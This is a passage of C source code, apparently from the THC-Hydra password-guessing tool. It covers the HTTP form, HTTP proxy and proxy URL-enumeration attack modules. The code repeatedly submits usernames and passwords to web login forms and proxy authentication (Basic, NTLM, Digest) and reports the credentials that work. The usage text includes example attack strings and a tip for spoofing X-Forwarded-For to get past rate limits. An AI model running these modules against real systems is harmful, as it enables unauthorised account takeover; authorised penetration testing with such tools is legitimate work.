HEADER_TYPE_DEFAULT))\n hdrrepv(&ptr_head, \"Content-Length\", \"0\");\n\n // re-use the above code to set cookies\n if (cookie_header != NULL)\n free(cookie_header);\n cookie_header = stringify_cookies(ptr_cookie);\n if (!header_exists(&ptr_head, \"Cookie\", HEADER_TYPE_DEFAULT))\n add_header(&ptr_head, \"Cookie\", cookie_header, HEADER_TYPE_DEFAULT);\n else\n hdrrepv(&ptr_head, \"Cookie\", cookie_header);\n\n // re-use the code above to check for proxy use\n if (use_proxy == 1 && proxy_authentication[selected_proxy] != NULL) {\n // proxy with authentication\n hdrrepv(&ptr_head, \"Host\", str2);\n memset(proxy_string, 0, sizeof(proxy_string));\n snprintf(proxy_string, MAX_PROXY_LENGTH - 1, \"http://%s%.600s\", webtarget, str3);\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"GET\", proxy_string, NULL, normal_request);\n } else {\n if (use_proxy == 1) {\n // proxy without authentication\n hdrrepv(&ptr_head, \"Host\", str2);\n memset(proxy_string, 0, sizeof(proxy_string));\n snprintf(proxy_string, MAX_PROXY_LENGTH - 1, \"http://%s%.600s\", webtarget, str3);\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"GET\", proxy_string, NULL, normal_request);\n } else {\n // direct web server, no proxy\n hdrrepv(&ptr_head, \"Host\", str2);\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n if (http_request != NULL)\n free(http_request);\n http_request = prepare_http_request(\"GET\", str3, NULL, normal_request);\n }\n }\n\n hydra_reconnect(s, ip, port, options, hostname);\n\n if (hydra_send(s, http_request, strlen(http_request), 0) < 0) {\n free(cookie_header);\n return 1;\n }\n\n found = analyze_server_response(s);\n if (strlen(cookie) > 0)\n process_cookies(&ptr_cookie, cookie);\n }\n }\n\n // if the last status is still 3xx, set it as a false\n if (found != -1 && found == success_cond && ((redirected_flag && code_302_is_success) || redirected_flag == 0 || success_cond == 1) && redirected_cpt >= 0) {\n hydra_report_found_host(port, ip, \"www-form\", fp);\n hydra_completed_pair_found();\n } else {\n hydra_completed_pair();\n }\n\n return 1;\n}\n\nvoid service_http_form(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname, char *type, ptr_header_node *ptr_head, ptr_cookie_node *ptr_cookie) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_HTTP, mysslport = PORT_HTTP_SSL;\n\n // register our socket descriptor\n hydra_register_socket(sp);\n\n /*\n * Iterate through the runs. Possible values are the following:\n * - 1 -> Open connection to remote server.\n * - 2 -> Run password attempts.\n * - 3 -> Disconnect and end with success.\n * - 4 -> Disconnect and end with error.\n */\n\n while (1) {\n if (run == 2) {\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n hydra_child_exit(1);\n }\n }\n switch (run) {\n case 1: /* connect and service init function */\n {\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, cannot connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n next_run = start_http_form(sock, ip, port, options, miscptr, fp, hostname, type, *ptr_head, *ptr_cookie);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n break;\n case 4: /* silent error exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(1);\n break;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nvoid service_http_get_form(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n ptr_cookie_node ptr_cookie = NULL;\n ptr_header_node ptr_head = initialize(ip, options, miscptr);\n\n if (ptr_head)\n service_http_form(ip, sp, options, miscptr, fp, port, hostname, \"GET\", &ptr_head, &ptr_cookie);\n else {\n hydra_report(stderr, \"[ERROR] Could not launch head. Error while initializing.\\n\");\n hydra_child_exit(2);\n }\n}\n\nvoid service_http_post_form(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n ptr_cookie_node ptr_cookie = NULL;\n ptr_header_node ptr_head = initialize(ip, options, miscptr);\n\n if (ptr_head)\n service_http_form(ip, sp, options, miscptr, fp, port, hostname, \"POST\", &ptr_head, &ptr_cookie);\n else {\n hydra_report(stderr, \"[ERROR] Could not launch head. Error while initializing.\\n\");\n hydra_child_exit(2);\n }\n}\n\nint32_t service_http_form_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n if (initialize(ip, options, miscptr) == NULL)\n return 1;\n\n return 0;\n}\n\nptr_header_node initialize(char *ip, unsigned char options, char *miscptr) {\n ptr_header_node ptr_head = NULL;\n char *ptr, *ptr2, *proxy_string;\n#ifdef AF_INET6\n unsigned char addr6[sizeof(struct in6_addr)];\n#endif\n\n if (use_proxy > 0 && proxy_count > 0)\n selected_proxy = random() % proxy_count;\n\n if (webtarget) {\n free(webtarget);\n webtarget = NULL;\n }\n\n if (cmdlinetarget != NULL)\n webtarget = cmdlinetarget;\n else\n webtarget = hydra_address2string(ip);\n if (port != 0)\n webport = port;\n else if ((options & OPTION_SSL) == 0)\n webport = PORT_HTTP;\n else\n webport = PORT_HTTP_SSL;\n\n /* normalise the webtarget for ipv6/port number */\n ptr = malloc(strlen(webtarget) + 1 /* null */ + 6 /* :65535 */\n#ifdef AF_INET6\n + 2 /* [] */\n#endif\n );\n#ifdef AF_INET6\n /* let libc decide if target is an ipv6 address */\n if (inet_pton(AF_INET6, webtarget, addr6)) {\n ptr2 = ptr + sprintf(ptr, \"[%s]\", webtarget);\n } else {\n#endif\n ptr2 = ptr + sprintf(ptr, \"%s\", webtarget);\n#ifdef AF_INET6\n }\n#endif\n if (options & OPTION_SSL && webport != PORT_HTTP_SSL || !(options & OPTION_SSL) && webport != PORT_HTTP) {\n sprintf(ptr2, \":%d\", webport);\n }\n webtarget = ptr;\n ptr = ptr2 = NULL;\n\n sprintf(bufferurl, \"%.6096s\", miscptr);\n ptr = url = bufferurl;\n\n while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\\\'))\n ptr++;\n if (*ptr != 0)\n *ptr++ = 0;\n variables = ptr;\n\n while (*ptr != 0 && (*ptr != ':' || *(ptr - 1) == '\\\\'))\n ptr++;\n if (*ptr != 0)\n *ptr++ = 0;\n\n optional1 = cond = ptr;\n\n ptr2 = ptr + strlen(ptr);\n\n while (ptr2 > ptr && (*ptr2 != ':' || *(ptr2 - 1) == '\\\\'))\n ptr2--;\n\n if (*ptr2 == ':') {\n *ptr2++ = 0;\n cond = ptr2;\n }\n\n if (optional1 == cond)\n optional1 = NULL;\n\n if (strstr(url, \"\\\\:\") != NULL) {\n if ((ptr = malloc(strlen(url) + 1)) != NULL) {\n strcpy(ptr, hydra_strrep(url, \"\\\\:\", \":\"));\n url = ptr;\n }\n }\n if (strstr(variables, \"\\\\:\") != NULL) {\n if ((ptr = malloc(strlen(variables) + 1)) != NULL) {\n strcpy(ptr, hydra_strrep(variables, \"\\\\:\", \":\"));\n variables = ptr;\n }\n }\n if (strstr(cond, \"\\\\:\") != NULL) {\n if ((ptr = malloc(strlen(cond) + 1)) != NULL) {\n strcpy(ptr, hydra_strrep(cond, \"\\\\:\", \":\"));\n cond = ptr;\n }\n }\n\n // printf(\"ptr: %s ptr2: %s cond: %s url: %s variables: %s optional1: %s\\n\", ptr, ptr2, cond, url, variables, optional1 == NULL ? \"null\" : optional1);\n\n if (url == NULL || variables == NULL || cond == NULL /*|| optional1 == NULL */)\n hydra_child_exit(2);\n\n if (*cond == 0) {\n fprintf(stderr, \"[ERROR] invalid number of parameters in module option\\n\");\n return NULL;\n }\n\n sprintf(cookieurl, \"%.1000s\", url);\n\n // conditions now have to contain F or S to set the fail or success condition\n if (strpos(cond, \"F=\") == 0) {\n success_cond = 0;\n cond += 2;\n } else if (*cond != 0 && (strpos(cond, \"S=\") == 0)) {\n success_cond = 1;\n cond += 2;\n } else {\n // by default condition is a fail\n success_cond = 0;\n }\n\n // printf(\"miscptr: %s, url=%s, variables=%s, ptr=%s, optional1: %s, cond: %s (%d)\\n\", miscptr, url, variables, ptr, optional1, cond, success_cond);\n\n /*\n * Parse the user-supplied options.\n * Beware of the backslashes (\\)!\n */\n if (!parse_options(optional1, &ptr_head))\n return NULL;\n\n /* again: no snprintf to be portable. don't worry, buffer can't overflow */\n if (use_proxy == 1 && proxy_authentication[selected_proxy] != NULL) {\n // proxy with authentication\n add_header(&ptr_head, \"Host\", webtarget, HEADER_TYPE_DEFAULT);\n add_header(&ptr_head, \"User-Agent\", \"Mozilla 5.0 (Hydra Proxy Auth)\", HEADER_TYPE_DEFAULT);\n proxy_string = (char *)malloc(strlen(proxy_authentication[selected_proxy]) + 10);\n if (proxy_string) {\n strcpy(proxy_string, \"Basic \");\n strcat(proxy_string, proxy_authentication[selected_proxy]);\n add_header(&ptr_head, \"Proxy-Authorization\", proxy_string, HEADER_TYPE_DEFAULT);\n } else {\n hydra_report(stderr, \"Out of memory for \\\"Proxy-Authorization\\\" header.\\n\");\n return NULL;\n }\n if (getcookie) {\n // doing a GET to save cookies\n if (cookie_request != NULL)\n free(cookie_request);\n cookie_request = stringify_headers(&ptr_head);\n }\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n } else {\n if (use_proxy == 1) {\n // proxy without authentication\n add_header(&ptr_head, \"Host\", webtarget, HEADER_TYPE_DEFAULT);\n add_header(&ptr_head, \"User-Agent\", \"Mozilla/5.0 (Hydra Proxy)\", HEADER_TYPE_DEFAULT);\n if (getcookie) {\n // doing a GET to get cookies\n if (cookie_request != NULL)\n free(cookie_request);\n cookie_request = stringify_headers(&ptr_head);\n }\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n } else {\n // direct web server, no proxy\n add_header(&ptr_head, \"Host\", webtarget, HEADER_TYPE_DEFAULT);\n add_header(&ptr_head, \"User-Agent\", \"Mozilla/5.0 (Hydra)\", HEADER_TYPE_DEFAULT);\n\n if (getcookie) {\n // doing a GET to save cookies\n if (cookie_request != NULL)\n free(cookie_request);\n cookie_request = stringify_headers(&ptr_head);\n }\n\n if (normal_request != NULL)\n free(normal_request);\n normal_request = stringify_headers(&ptr_head);\n }\n }\n\n ptr_header_node cur_ptr = NULL;\n for (cur_ptr = ptr_head; cur_ptr; cur_ptr = cur_ptr->next) {\n if ((cur_ptr->type == HEADER_TYPE_USERHEADER || cur_ptr->type == HEADER_TYPE_USERHEADER_REPL) && strstr(cur_ptr->value, \"^RAND_IP^\")) {\n uses_random_ip = 1;\n break;\n }\n }\n\n return ptr_head;\n}\n\nvoid usage_http_form(const char *service) {\n printf(\"Module %s requires the page and the parameters for the web form.\\n\\n\"\n \"By default this module is configured to follow a maximum of 5 \"\n \"redirections in\\n\"\n \"a row. It always gathers a new cookie from the same URL without \"\n \"variables\\n\"\n \"The parameters requires at a minimum three \\\":\\\" separated values,\\n\"\n \"plus optional values.\\n\"\n \"(Note: if you need a colon in the option string as value, escape it \"\n \"with \\\"\\\\:\\\", but do not escape a \\\"\\\\\\\" with \\\"\\\\\\\\\\\".)\\n\"\n \"\\nSyntax: :
[:[:]:\\n\"\n \"\\nFirst is the page on the server to GET or POST to (URL), e.g. \\\"/login\\\".\\n\"\n \"Second is the POST/GET variables (taken from either the browser, proxy, etc.)\\n\"\n \" without the initial '?' character and the usernames and passwords being\\n\"\n \" replaced with \\\"^USER^\\\" (\\\"^USER64^\\\" for base64 encodings) and \\\"^PASS^\\\"\\n\"\n \" (\\\"^PASS64^\\\" for base64 encodings).\\n\"\n \"Third are optional parameters (see below)\\n\"\n \"Last is the string that it checks for an *invalid* login (by default).\\n\"\n \" Invalid condition login check can be preceded by \\\"F=\\\", successful condition\\n\"\n \" login check must be preceded by \\\"S=\\\".\\n\"\n \" This is where most people get it wrong! You have to check the webapp what a\\n\"\n \" failed string looks like and put it in this parameter! Add the -d switch to see\\n\"\n \" the sent/received data!\\n\"\n \" Important: you can only define S= *OR* F= - not both\\n\",\n \" Note that using invalid login condition checks can result in false positives!\\n\"\n \"\\nThe following parameters are optional and are put between the form parameters\\n\"\n \"and the condition string; separate them too with colons:\\n\"\n \" 1= 401 error response is interpreted as user/pass wrong\\n\"\n \" 2= 302 page forward return codes identify a successful attempt\\n\"\n \" M= attack forms that use multipart format\\n\"\n \" (c|C)=/page/uri to define a different page to gather initial \"\n \"cookies from\\n\"\n \" (g|G)= skip pre-requests - only use this when no pre-cookies are required\\n\"\n \" (h|H)=My-Hdr\\\\: foo to send a user defined HTTP header with each \"\n \"request\\n\"\n \" ^USER[64]^, ^PASS[64]^, and ^RAND_IP^ can also be put into these \"\n \"headers!\\n\"\n \" ^RAND_IP^ generates a random IP address for each login attempt,\\n\"\n \" useful for testing rate limit bypass (e.g. h=X-Forwarded-For\\\\: ^RAND_IP^).\\n\"\n \" Note: 'h' will add the user-defined header at the end\\n\"\n \" regardless it's already being sent by Hydra or not.\\n\"\n \" 'H' will replace the value of that header if it \"\n \"exists, by the\\n\"\n \" one supplied by the user, or add the header at the \"\n \"end\\n\"\n \"\\nNote that if you are going to put colons (:) in your headers you should escape\\n\"\n \"them with a backslash (\\\\). All colons that are not option separators should be\\n\"\n \"escaped (see the examples above and below).\\n\"\n \"You can specify a header without escaping the colons, but that way you will not\\n\"\n \"be able to put colons in the header value itself, as they will be interpreted by\\n\"\n \"hydra as option separators.\\n\"\n \"\\nExamples:\\n\"\n \" \\\"/login.php:user=^USER^&pass=^PASS^:incorrect\\\"\\n\"\n \" \\\"/\"\n \"login.php:user=^USER64^&pass=^PASS64^&colon=colon\\\\:escape:S=result=\"\n \"success\\\"\\n\"\n \" \\\"/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed\\\"\\n\"\n \" \\\"/:user=^USER^&pass=^PASS^:H=Authorization\\\\: Basic \"\n \"dT1w:H=Cookie\\\\: sessid=aaaa:h=X-User\\\\: ^USER^:H=User-Agent\\\\: wget\\\"\\n\"\n \" \\\"/exchweb/bin/auth/:F=failed\"\n \"owaauth.dll:destination=http%%3A%%2F%%2F%%2Fexchange&flags=0&\"\n \"username=%%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:\"\n \"C=/exchweb\\\":reason=\\n\"\n \"To attack multiple targets, you can use the -M option with a file \"\n \"containing the targets and their parameters.\\n\"\n \"Example file content:\\n\"\n \" localhost:8443/login:type=login&login=^USER^&password=^PASS^:h=test\\\\: header:F=401\\n\"\n \" localhost:9443/login2:type=login&login=^USER^&password=^PASS^:h=test\\\\: header:F=302\\n\"\n \" ...\\n\\n\",\n service);\n}\n" }, { "path": "hydra-http-proxy-urlenum.c", "content": "#include \"hydra-mod.h\"\n#include \"sasl.h\"\n\nextern char *HYDRA_EXIT;\nchar *buf;\nstatic int32_t http_proxy_auth_mechanism = AUTH_ERROR;\n\nint32_t start_http_proxy_urlenum(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp, char *hostname) {\n char *empty = \"\";\n char *login, *pass, buffer[500], buffer2[500], mlogin[260], mpass[260], mhost[260];\n char url[260], host[30];\n char *header = \"\"; /* XXX TODO */\n char *ptr;\n int32_t auth = 0;\n\n login = hydra_get_next_login();\n if (login == NULL || strlen(login) == 0 || strstr(login, \"://\") == NULL) {\n hydra_completed_pair();\n return 1;\n }\n pass = hydra_get_next_password();\n pass = empty; // ignored\n\n strncpy(url, login, sizeof(url) - 1);\n url[sizeof(url) - 1] = 0;\n ptr = strstr(login, \"://\") + 3;\n if (ptr[0] == '[')\n ptr++;\n strncpy(mhost, ptr, sizeof(mhost) - 1);\n mhost[sizeof(mhost) - 1] = 0;\n if ((ptr = strchr(mhost, '/')) != NULL)\n *ptr = 0;\n if ((ptr = strchr(mhost, ']')) != NULL)\n *ptr = 0;\n else if ((ptr = strchr(mhost, ':')) != NULL)\n *ptr = 0;\n\n if (miscptr != NULL && strchr(miscptr, ':') != NULL) {\n strncpy(mlogin, miscptr, sizeof(mlogin) - 1);\n mlogin[sizeof(mlogin) - 1] = 0;\n ptr = strchr(mlogin, ':');\n *ptr++ = 0;\n strncpy(mpass, ptr, sizeof(mpass) - 1);\n mpass[sizeof(mpass) - 1] = 0;\n auth = 1;\n }\n\n if (http_proxy_auth_mechanism == AUTH_ERROR) {\n // send dummy request\n sprintf(buffer, \"GET %s HTTP/1.0\\r\\n%sUser-Agent: Mozilla/4.0 (Hydra)\\r\\n%s\\r\\n\", url, mhost, header);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n\n // receive first 40x\n buf = hydra_receive_line(s);\n while (buf != NULL && strstr(buf, \"HTTP/\") == NULL) {\n free(buf);\n buf = hydra_receive_line(s);\n }\n\n if (debug)\n hydra_report(stderr, \"S:%s\\n\", buf);\n\n // after the first query we should have been disconnected from web server\n s = hydra_disconnect(s);\n if ((options & OPTION_SSL) == 0) {\n s = hydra_connect_tcp(ip, port);\n } else {\n s = hydra_connect_ssl(ip, port, hostname);\n }\n }\n\n if (auth) {\n if (hydra_strcasestr(buf, \"Proxy-Authenticate: Basic\") != NULL) {\n http_proxy_auth_mechanism = AUTH_BASIC;\n sprintf(buffer2, \"%.50s:%.50s\", login, pass);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer,\n \"GET %s HTTP/1.0\\r\\n%sProxy-Authorization: Basic \"\n \"%s\\r\\nUser-Agent: Mozilla/4.0 (Hydra)\\r\\n%s\\r\\n\",\n url, host, buffer2, header);\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n free(buf);\n buf = hydra_receive_line(s);\n while (buf != NULL && strstr(buf, \"HTTP/1.\") == NULL) {\n free(buf);\n buf = hydra_receive_line(s);\n }\n\n // if server cut the connection, just exit cleanly or\n // this will be an infinite loop\n if (buf == NULL) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Server did not answer\\n\");\n return 3;\n }\n\n if (debug)\n hydra_report(stderr, \"S:%s\\n\", buf);\n } else {\n if (hydra_strcasestr(buf, \"Proxy-Authenticate: NTLM\") != NULL) {\n unsigned char buf1[4096];\n unsigned char buf2[4096];\n char *pos = NULL;\n\n http_proxy_auth_mechanism = AUTH_NTLM;\n // send auth and receive challenge\n // send auth request: let the server send it's own hostname and\n // domainname\n buildAuthRequest((tSmbNtlmAuthRequest *)buf2, 0, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *)buf2));\n\n /* to be portable, no snprintf, buffer is big enough so it can't\n * overflow */\n // send the first..\n sprintf(buffer,\n \"GET %s HTTP/1.0\\r\\n%sProxy-Authorization: NTLM %s\\r\\nUser-Agent: \"\n \"Mozilla/4.0 (Hydra)\\r\\nProxy-Connection: keep-alive\\r\\n%s\\r\\n\",\n url, host, buf1, header);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n\n // receive challenge\n free(buf);\n buf = hydra_receive_line(s);\n while (buf != NULL && (pos = hydra_strcasestr(buf, \"Proxy-Authenticate: NTLM \")) == NULL) {\n free(buf);\n buf = hydra_receive_line(s);\n }\n if (pos != NULL) {\n char *str;\n\n pos += 25;\n if ((str = strchr(pos, '\\r')) != NULL) {\n pos[str - pos] = 0;\n }\n if ((str = strchr(pos, '\\n')) != NULL) {\n pos[str - pos] = 0;\n }\n }\n // recover challenge\n if (buf != NULL) {\n if (strlen(buf) >= 4)\n from64tobits((char *)buf1, pos);\n free(buf);\n }\n // Send response\n buildAuthResponse((tSmbNtlmAuthChallenge *)buf1, (tSmbNtlmAuthResponse *)buf2, 0, login, pass, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *)buf2));\n sprintf(buffer,\n \"GET %s HTTP/1.0\\r\\n%sProxy-Authorization: NTLM %s\\r\\nUser-Agent: \"\n \"Mozilla/4.0 (Hydra)\\r\\nProxy-Connection: keep-alive\\r\\n%s\\r\\n\",\n url, host, buf1, header);\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 1;\n\n buf = hydra_receive_line(s);\n while (buf != NULL && strstr(buf, \"HTTP/1.\") == NULL) {\n free(buf);\n buf = hydra_receive_line(s);\n }\n\n if (buf == NULL)\n return 1;\n } else {\n#ifdef LIBOPENSSL\n if (hydra_strcasestr(buf, \"Proxy-Authenticate: Digest\") != NULL) {\n char *pbuffer, *result;\n\n http_proxy_auth_mechanism = AUTH_DIGESTMD5;\n pbuffer = hydra_strcasestr(buf, \"Proxy-Authenticate: Digest \");\n strncpy(buffer, pbuffer + strlen(\"Proxy-Authenticate: Digest \"), sizeof(buffer));\n buffer[sizeof(buffer) - 1] = '\\0';\n\n pbuffer = buffer2;\n result = sasl_digest_md5(pbuffer, login, pass, buffer, miscptr, \"proxy\", host, 0, header);\n if (result == NULL)\n return 3;\n\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer2);\n if (hydra_send(s, buffer2, strlen(buffer2), 0) < 0)\n return 1;\n\n free(buf);\n buf = hydra_receive_line(s);\n while (buf != NULL && strstr(buf, \"HTTP/1.\") == NULL) {\n free(buf);\n buf = hydra_receive_line(s);\n }\n\n if (debug && buf != NULL)\n hydra_report(stderr, \"S:%s\\n\", buf);\n\n if (buf == NULL)\n return 1;\n\n } else\n#endif\n {\n if (buf != NULL) {\n buf[strlen(buf) - 1] = '\\0';\n hydra_report(stderr, \"Unsupported Auth type:\\n%s\\n\", buf);\n } else {\n hydra_report(stderr, \"Unsupported Auth type\\n\");\n }\n return 3;\n }\n }\n }\n }\n // result analysis\n ptr = ((char *)strchr(buf, ' ')) + 1;\n if (*ptr == '2' || (*ptr == '3' && (*(ptr + 2) == '1' || *(ptr + 2) == '2')) || strncmp(ptr, \"404\", 4) == 0 || strncmp(ptr, \"403\", 4) == 0) {\n hydra_report_found_host(port, ip, \"http-proxy\", fp);\n if (fp != stdout)\n fprintf(fp, \"[%d][http-proxy-urlenum] host: %s url: %s\\n\", port, hydra_address2string_beautiful(ip), url);\n printf(\"[%d][http-proxy-urlenum] host: %s url: %s\\n\", port, hydra_address2string_beautiful(ip), url);\n hydra_completed_pair_found();\n } else {\n if (strncmp(ptr, \"407\", 3) == 0 /*|| strncmp(ptr, \"401\", 3) == 0 */) {\n hydra_report(stderr, \"[ERROR] Proxy reports bad credentials!\\n\");\n return 3;\n }\n hydra_completed_pair();\n }\n\n free(buf);\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_http_proxy_urlenum(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_HTTP_PROXY, mysslport = PORT_HTTP_PROXY_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n {\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n next_run = start_http_proxy_urlenum(sock, ip, port, options, miscptr, fp, hostname);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_http_proxy_urlenum_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_http_proxy_urlenum(const char *service) {\n printf(\"Module http-proxy-urlenum only uses the -L option, not -x or -p/-P \"\n \"option.\\n\"\n \"The -L loginfile must contain the URL list to try through the proxy.\\n\"\n \"The proxy credentials cann be put as the optional parameter, e.g.\\n\"\n \" hydra -L urllist.txt -s 3128 target.com http-proxy-urlenum \"\n \"user:pass\\n\"\n \" hydra -L urllist.txt \"\n \"http-proxy-urlenum://target.com:3128/user:pass\\n\\n\");\n}\n" }, { "path": "hydra-http-proxy.c", "content": "#include \"hydra-mod.h\"\n#include \"sasl.h\"\n\nextern char *HYDRA_EXIT;\nstatic int32_t http_proxy_auth_mechanism = AUTH_ERROR;\nchar *http_proxy_buf = NULL;\n\nint32_t start_http_proxy(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp, char *hostname) {\n char *empty = \"\";\n char *login, *pass, buffer[5000], buffer2[4500];\n char url[510], host[60];\n char *header = \"\"; /* XXX TODO */\n char *ptr, *fooptr, *auth_hdr;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n if (miscptr == NULL) {\n strcpy(url, \"http://www.microsoft.com/\");\n strcpy(host, \"Host: www.microsoft.com\\r\\n\");\n } else {\n sprintf(url, \"%.500s\", miscptr);\n ptr = strstr(miscptr, \"://\"); // :// check is in hydra.c\n sprintf(host, \"Host: %.50s\", ptr + 3);\n if ((ptr = strchr(host, '/')) != NULL)\n *ptr = 0;\n if ((ptr = strchr(host + 6, ':')) != NULL && host[0] != '[')\n *ptr = 0;\n strcat(host, \"\\r\\n\");\n }\n\n if (http_proxy_auth_mechanism != AUTH_BASIC && (http_proxy_auth_mechanism == AUTH_ERROR || http_proxy_buf == NULL)) {\n // send dummy request\n sprintf(buffer, \"GET %s HTTP/1.0\\r\\n%sUser-Agent: Mozilla/4.0 (Hydra)\\r\\n%s\\r\\n\", url, host, header);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 3;\n\n // receive first 40x\n http_proxy_buf = hydra_receive_line(s);\n while (http_proxy_buf != NULL && strstr(http_proxy_buf, \"HTTP/\") == NULL) {\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n }\n\n if (http_proxy_buf == NULL) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Server did not answer\\n\");\n return 3;\n }\n\n if (debug) {\n hydra_report(stderr, \"S:%-.*s\\n\", (int)(strchr(http_proxy_buf, '\\r') - http_proxy_buf), http_proxy_buf);\n }\n\n while (http_proxy_buf != NULL && (auth_hdr = hydra_strcasestr(http_proxy_buf, \"Proxy-Authenticate:\")) == NULL) {\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n }\n\n if (auth_hdr == NULL) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Proxy seems not to require authentication\\n\");\n return 3;\n }\n\n if (debug) {\n hydra_report(stderr, \"S:%-.*s\\n\", (int)(strchr(auth_hdr, '\\r') - auth_hdr), auth_hdr);\n }\n\n // after the first query we should have been disconnected from web server\n s = hydra_disconnect(s);\n if ((options & OPTION_SSL) == 0) {\n s = hydra_connect_tcp(ip, port);\n } else {\n s = hydra_connect_ssl(ip, port, hostname);\n }\n }\n\n if (http_proxy_auth_mechanism == AUTH_BASIC || hydra_strcasestr(auth_hdr, \"Proxy-Authenticate: Basic\") != NULL) {\n http_proxy_auth_mechanism = AUTH_BASIC;\n auth_hdr = NULL;\n sprintf(buffer2, \"%.50s:%.50s\", login, pass);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer,\n \"GET %s HTTP/1.0\\r\\n%sProxy-Authorization: Basic %s\\r\\nUser-Agent: \"\n \"Mozilla/4.0 (Hydra)\\r\\n%s\\r\\n\",\n url, host, buffer2, header);\n if (debug)\n hydra_report(stderr, \"C:%s\\n\", buffer);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0)\n return 3;\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n while (http_proxy_buf != NULL && strstr(http_proxy_buf, \"HTTP/1.\") == NULL) {\n free(http_proxy_buf);\n http_proxy_buf = hydra_receive_line(s);\n }\n\n // if server cut the connection, just exit cleanly or\n // this will be an infinite loop\n if (http_proxy_buf == NULL) 